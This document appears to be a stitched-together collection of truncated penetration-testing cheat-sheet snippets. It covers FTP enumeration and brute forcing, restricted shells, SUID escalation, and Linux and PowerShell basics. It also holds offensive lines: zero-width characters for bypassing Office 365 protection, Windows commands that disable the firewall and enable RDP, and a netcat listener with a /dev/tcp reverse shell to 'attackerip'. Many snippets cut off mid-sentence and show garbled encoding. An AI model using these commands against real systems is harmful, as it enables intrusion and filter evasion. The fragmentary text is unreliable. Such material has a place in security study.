FTP port 21 open
>telnet ip_address 21 (Banner grab)
>> Run command ftp ip_address
>> Check for anonymous access
>>> ftp ip_addressUsername: anonymous OR anonPassword: email@example.com
> Hydra brute force
alias Create an alias •
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian/Ubuntu)
aptitude Search for and install software packages (Debian/Ubuntu)
aspell Spell Checker
awk Find and Replace text, database sort/validate/index
basename Strip directory and suffix fro...
Unix shell that restricts some of the capabili=es available to an interac=ve user, such as:
– Using cd to change directories
– SeEng or unseEng certain environment variables (e.g. SHELL or PATH)
– Specifying command names containing ‘ / ’
– Redirec=ng output using >, >>, >|, >&, &> operators –...
Zero-Width Spaces to Bypass MS Office 365 Protection
​ - Zero-width space
‌ - zero width non-joiner
‍ - zero width joiner
﻿ - zero width no-break space
０ - full width digit zero
​ (Zero-Width Space)
‌ (Zero-Width Non-Joiner)
‍ (Zero-Width Joiner)
It’s a way in UNIX-like operating systems of running a command as another user without providing credentials. When an executable file is run, the kernel checks its file permissions and, if it sees a bit (known as the SUID bit) on the file, it sets the effective user id of the resultant process to the owner of the file. There is also an equivalent...
We have all heard the cautionary stories about UNIX SUID executables and how we should be careful when coding them because they can provide an easy route to root (pun intended). Unfortunately not everybody fully understands this and I have got root a couple of times through ill thought out SUID executables.
I had one of these in a recent test an...
What is PowerShell?
PowerShell is an interactive Command-Line Interface (CLI) and automation engine designed by Microsoft to help design system configurations and automate administrative tasks. This tool has its own command-line with a unique programming language similar to Perl. Initially, PowerShell was designed to manage objects on users’ com...
1- /bin : Contains all binary executable programs required for booting and repairing of the system. It also contains commands required to run into single-user-mode and other basic commands like ps, ls, ping, grep, cp, less.
2- /boot : Boot loader files including Linux Kernel and grub files.
3- /dev : Contains all device files required for the har...
net user user1
# Set path:
netsh firewall show state
netsh firewall show config
# Turn firewall off
netsh firewall set opmode disable
# allow RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Se...
First of all, on your machine, set up a listener, where attackerip is your IP address and 4444 is an arbitrary TCP port unfiltered by the target's firewall:
attacker$ nc -l -v attackerip 4444
Alternatives for Bash shell:
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <...